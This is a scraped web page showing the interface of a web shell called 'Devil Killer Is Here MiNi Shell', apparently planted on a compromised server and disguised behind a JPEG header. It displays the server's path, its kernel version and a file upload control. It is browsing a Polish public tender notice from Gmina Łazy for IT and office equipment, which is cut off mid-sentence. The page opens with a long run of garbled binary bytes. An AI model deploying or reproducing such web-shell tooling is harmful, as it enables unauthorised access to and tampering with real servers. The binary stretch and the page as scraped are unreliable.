JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20251203/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20251203/0057477801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa wyposażenia Centrum Usług Społecznych w Łazach. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ŁAZY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276258865</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Traugutta 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łazy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-450</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wirum@lazy.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.umlazy.finn.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa wyposażenia Centrum Usług Społecznych w Łazach. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4cef2ce2-13dd-493f-9c43-e594a24392f1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00574778</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-12-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00020759/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa wyposażenia dla Centrum Usług Społecznych w Łazach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie jest dofinansowane w ramach: Fundusze Europejskie dla Śląskiego 2021-2027 (Europejski Fundusz Społeczny+); Priorytet: FESL.07.00-Fundusze Europejskie dla społeczeństwa; Działanie: FESL.07.05-Strategiczne projekty dla obszaru usług społecznych Tytuł projektu: CUS - Nowe spojrzenie na usługi społeczne </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-4cef2ce2-13dd-493f-9c43-e594a24392f1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/> Wykonawcami odbywa się drogą elektroniczną przy użyciu przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/> https://ezamowienia.gov.pl.<br/> 2. Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski&#34;, widocznej w podglądzie postępowania po zalogowaniu się<br/> na konto Wykonawcy na Platformie e-Zamówienia.<br/> 3. Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/> komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”).<br/> 3. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej.<br/> 4. Zamawiający dopuszcza także możliwość składania przez Wykonawców dokumentów elektronicznych, oświadczeń lub<br/> elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres e - mail: wirum@lazy.pl (z<br/> wyłączeniem składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Minimalne wymagania techniczne<br/> dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia<br/> określa Regulamin Platformy e-Zamówienia.<br/> 2. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/> skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu 22 458 77 99 lub drogą elektroniczną poprzez formularz<br/> udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/> 3. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/> zgodny z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/> sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/> elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/> 4. Ofertę, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, w tym oświadczenie, o którym<br/> mowa w art. 117 ust. 4 ustawy Pzp, zobowiązanie podmiotu udostępniającego zasoby oraz pełnomocnictwo sporządza się w postaci<br/> elektronicznej, w formatach danych określonych w Rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych<br/> Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz<br/> minimalnych wymagań dla systemów teleinformatycznych. Pozostałe informacje, oświadczenia lub dokumenty sporządza się w<br/> postaci elektronicznej w formatach danych określonych w przepisach ww. rozporządzenia lub jako tekst wpisany bezpośrednio do<br/> wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza<br/> do komunikacji”).<br/> 5. Do podpisania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego<br/> podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego.<br/> 6. Wykonawca przygotowuje ofertę przy pomocy interaktywnego „Formularza ofertowego&#34; udostępnionego przez Zamawiającego na<br/> Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe&#34;.<br/> 7. Pozostałe wymagania techniczne i organizacyjne dot. korespondencji elektronicznej określono w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/> 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/> swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/> L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/> administratorem Pani/Pana danych osobowych jest Burmistrz Łaz z siedzibą w Urzędzie Miejskim w Łazach, ul. Traugutta 15, 42<br/>450 Łazy, tel. 32 6729434, fax. 32 6729448, e-mail: um@lazy.pl<br/> Administrator wyznaczył Inspektora Ochrony Danych, z którym może się Pani/Pan skontaktować w sprawach związanych z ochroną<br/> danych osobowych, w następujący sposób:<br/> 1) pod adresem poczty elektronicznej: iod@lazy.pl<br/> 2) pod numerem telefonu: 32 6729434<br/> 3) pisemnie na adres: Urząd Miejski w Łazach, 42-450 Łazy, ul. Traugutta 15 z dopiskiem „Inspektor ochrony danych”.<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/> postępowaniem o udzielenie zamówienia publicznego;<br/> odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/> oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.); <br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/> postępowania o udzielenie zamówienia lub na okres przechowywania tych danych zgodnie z wytycznymi o dofinansowania z<br/> środków UE;<br/> obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/> określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/> niepodania określonych danych wynikają z ustawy Pzp; <br/>w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/> 22 RODO;<br/> posiada Pani/Pan:<br/> − na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/> − na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/> − na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/> przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/> osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> nie przysługuje Pani/Panu:<br/> − w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> − prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> − na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/> Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO<br/> względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/> Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z<br/> włączeń, o których mowa w art. 14 ust. 5 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">PRAWO WNIESIENIA SKARGI DO ORGANU NADZORCZEGO.<br/> Gdy uzna Pani/Pan, że przetwarzanie Pani/Pana danych osobowych narusza przepisy o ochronie danych osobowych, przysługuje<br/> Pani/Panu prawo do wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych, z siedzibą<br/> w Warszawie, przy ul. Stawki 2, 00-193 Warszawa.<br/> INFORMACJA O WYMOGU/DOBROWOLNOŚCI PODANIA DANYCH ORAZ KONSEKWENCJACH NIEPODANIA DANYCH<br/> OSOBOWYCH.<br/> Podanie przez Panią/Pana danych osobowych jest związane z Pani/Pana udziałem w postępowaniu o udzielenie zamówienia<br/> publicznego a obowiązek ich podania wynika z ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych. Konsekwencje<br/> niepodania danych osobowych wynikają z ustawy Pzp.<br/> ZAUTOMATYZOWANE PODEJMOWANIE DECYZJI, PROFILOWANIE.<br/> Nie będzie Pani/Pan podlegać decyzji, opierającej się na zautomatyzowanym przetwarzaniu, która jednocześnie będzie wywoływała<br/> wobec Pani/Pana skutki prawne lub w podobny sposób istotnie na Panią/Pana wpływała. Pani/Pana dane osobowe nie będą<br/> profilowane.<br/> * Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu<br/> przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/> ** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/> o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym <br/>z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/> *** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu <br/>do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/> prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WID. 271.24.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zadanie nr 1 - Dostawa sprzętu IT do Centrum Usług Społecznych w Łazach przy ul. Pocztowej 14.<br/>2. Adres dostawy: Centrum Usług Społecznych w Łazach, 42-450 Łazy ul. Pocztowa 14;<br/> 3. Dostarczone wyposażenie musi być fabrycznie nowe, wolne od wad, wykonane w bezpiecznych technologiach. Musi<br/> spełniać wymagania norm UE, a produkty, które tego wymagają muszą posiadać aktualne certyfikaty bezpieczeństwa,<br/> atesty, świadectwa jakości i spełniać wszelkie wymogi norm określonych obowiązującym prawem.<br/> 4. W przypadku mebli i wyposażenia wymagającego wniesienia, montażu, złożenia, podłączenia i/lub instalacji, Wykonawca<br/> zobowiązany jest dokonać wniesienia, montażu/złożenia/skręcenia w miejscu uzgodnionym z Zamawiającym. Zamawiający<br/> informuje o ewentualnym doliczeniu do ceny opłat w ofercie za wniesienie, montaż, złożenie, podłączenie itd. przedmiotu<br/> dostawy do pomieszczeń CUS. Wykonawca zobowiązany jest również do posprzątania pomieszczenia po montażu mebli<br/> oraz zabrania opakowań w których dostarczono meble i wyposażenie. <br/>5. Po dostarczeniu wszystkich elementów wyposażenia oraz po zakończeniu montażu, Wykonawca zobowiązany jest do<br/> uporządkowania terenu dostaw i miejsca montażu oraz zabranie opakowań. Wszelkie zniszczenia powstałe podczas i w<br/> wyniku montażu będą usuwane przez Wykonawcę na własny koszt i własnym staraniem. <br/>6. Wykonawca będzie mógł przystąpić do montażu i instalacji wyposażenia po weryfikacji przez Zamawiającego spełniania<br/> przez poszczególne elementy wyposażenia parametrów określonych w dokumentach zamówienia i ich akceptacji przez<br/> Zamawiającego.<br/> 7. Najpóźniej z dniem dostawy Wykonawca dostarczy Zamawiającemu karty gwarancyjne w formie papierowej w języku<br/> polskim. <br/>8. Szczegółowy opis oraz sposób realizacji przedmiotu zamówienia został określony w opisie przedmiotu zamówienia, który<br/> stanowi załącznik nr 5 do SWZ oraz we wzorze umowy, który stanowi załącznik nr 4 do SWZ. <br/>9. Wskazane w dokumentach znaki towarowe, nazwy własne, itp. – stanowią wyłącznie wzorzec jakościowy, funkcjonalny,<br/> techniczny i technologiczny dotyczący przedmiotu zamówienia. We wszystkich przypadkach, w których ze względu na<br/> specyfikację pochodzenie, dopuszcza się stosowanie materiałów, urządzeń równoważnych, tj. wszelkie wymienione z<br/> nazwy materiały, urządzenia użyte w przekazanej przez Zamawiającego dokumentacji lub ich pochodzenie, służą wyłącznie<br/> określeniu standardu i mogą być zastąpione innymi o nie gorszych parametrach technicznych, użytkowych, jakościowych,<br/> funkcjonalnych i walorach estetycznych, przy uwzględnieniu prawidłowej współpracy z pozostałymi materiałami,<br/> urządzeniami. Użyte w dokumentacji zamówienia nazwy, które wskazują lub mogłyby kojarzyć się z producentem lub firmą,<br/> nie mają na celu preferowanie rozwiązań danego producenta lecz wskazanie na rozwiązanie, które powinno posiadać cechy<br/> techniczne, technologiczne nie gorsze od podanych w dokumentacji technicznej. Zamawiający w przypadku ofert<br/> zawierających rozwiązania równoważne będzie je weryfikować pod względem spełniania wymogów poszczególnych pozycji<br/> wymagań technicznych zawartych w załącznikach do Specyfikacji. Wykonawca zobowiązany jest udowodnić w ofercie<br/> równoważność oferowanych urządzeń lub systemów. Ciężar udowodnienia równoważności jest obowiązkiem Wykonawcy.<br/> Zamawiający nie uzna rozwiązań równoważnych, jeśli będą o gorszych niż wskazane w załącznikach do Specyfikacji<br/> minimalnych wymaganiach jakościowych, funkcjonalnych, technicznych i technologicznych.<br/> 10. Zamieszczone w dokumentacji zamówienia wymienione nazwy producentów (jeśli takie się pojawią) użyto jedynie w<br/> celu przykładowym. Ewentualnie wskazane nazwy produktów oraz ich producentów nie mają na celu naruszenie zasady<br/> uczciwej konkurencji i równego traktowania wykonawców. Wszędzie gdzie są one wskazane, należy czytać w ten sposób,<br/> że towarzyszy im określenie „lub równoważne”. Przez pojęcie „lub równoważne” Zamawiający rozumie oferowanie<br/> materiałów gwarantujących realizację zadania zapewniających uzyskanie parametrów technicznych nie gorszych od<br/> założonych w wyżej wymienionych dokumentach. Zastosowanie rozwiązań równoważnych nie może prowadzić do<br/> pogorszenia właściwości przedmiotu zamówienia w stosunku do przewidzianych w dokumentacji technicznej, ani do zmiany<br/> ceny, ani do naruszenia przepisów prawa.<br/> 11. W przypadku spełnienia powyższych warunków Zamawiający dopuszcza stosowanie rozwiązań równoważnych. Jeżeli<br/> Wykonawca zaoferuje rozwiązania równoważne, musi wykazać w ofercie, że proponowany przez niego przedmiot<br/> zamówienia spełnia wymagania określone przez Zamawiającego. <br/>12. Ilekroć niniejsza specyfikacja opisuje przedmiot zamówienia za pomocą norm, ocen technicznych, specyfikacji<br/> technicznych i systemów referencji technicznych, Zamawiający dopuszcza rozwiązania równoważne opisywanym.<br/> Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, udowodni w ofercie, w szczególności za pomocą przedmiotowych środków dowodowych, o których mowa w art. 104–107 ustawy Pzp, że<br/> proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32552110-1 - Telefony bezprzewodowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">30121430-6 - Cyfrowe urządzenia powielające</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Zamówienie udzielone będzie wyłącznie Wykonawcy wybranemu zgodnie z przepisami ustawy Prawo zamówień publicznych. Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w Specyfikacji Warunków Zamówienia. Jeżeli Zamawiający nie będzie mógł wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną.<br/><br/>2.Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/><br/>ZADANIE NR 1, 2, 3<br/>2.1.Kryterium „cena” – wskaźnik C, ranga –60.<br/><br/>Wskaźnik C obliczany jest wg wzoru:<br/>C = (C m / C b) x 100 pkt x 60<br/>gdzie:<br/>C m –najniższa cena oferty,<br/>C b –cena oferty badanej<br/>(wynik działania zostanie zaokrąglony do 2 miejsc po przecinku) <br/>	Maksymalna liczba punktów jaką można uzyskać – 60 <br/><br/>2.2.Kryterium „Termin realizacji zamówienia ” wskaźnik T, ranga – 40.<br/><br/>będzie rozpatrywane na podstawie zadeklarowanego przez wykonawcę w formularzu ofertowym okresu terminu realizacji zamówienia na dostawę przedmiotu zamówienia w tygodniach, zgodnie z poniższymi zasadami: <br/>do 7 dni– 0 pkt <br/>do 5 dni– 20 pkt<br/>do 3 dni – 40 pkt <br/><br/>Maksymalna liczba punktów jaką można uzyskać – 40<br/><br/>UWAGA! <br/>a 1. Termin realizacji zamówienia wskazany w formularzu ofertowym liczony będzie od momentu zawarcia umowy. <br/>b 2. termin realizacji zamówienia nie może być dłuższy niż 7 dni. <br/>3. Ocena kryterium nastąpi na podstawie oświadczenia złożonego przez Wykonawcę w Formularzu oferty – załącznik nr 1 do SWZ.<br/><br/>4.Końcowa ocena oferty to suma punktów uzyskanych za poszczególne kryteria wg wzoru:<br/>Lp = C 